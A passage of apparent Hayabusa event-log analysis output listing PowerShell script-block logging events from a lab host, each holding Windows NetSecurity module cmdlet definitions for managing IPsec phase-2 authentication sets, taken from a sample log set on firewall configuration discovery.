(cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is 
[System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and 
(@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 
'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { 
$__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.973 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 
'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, 
$__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.973 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Rename-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, 
$true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch 
-exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { 
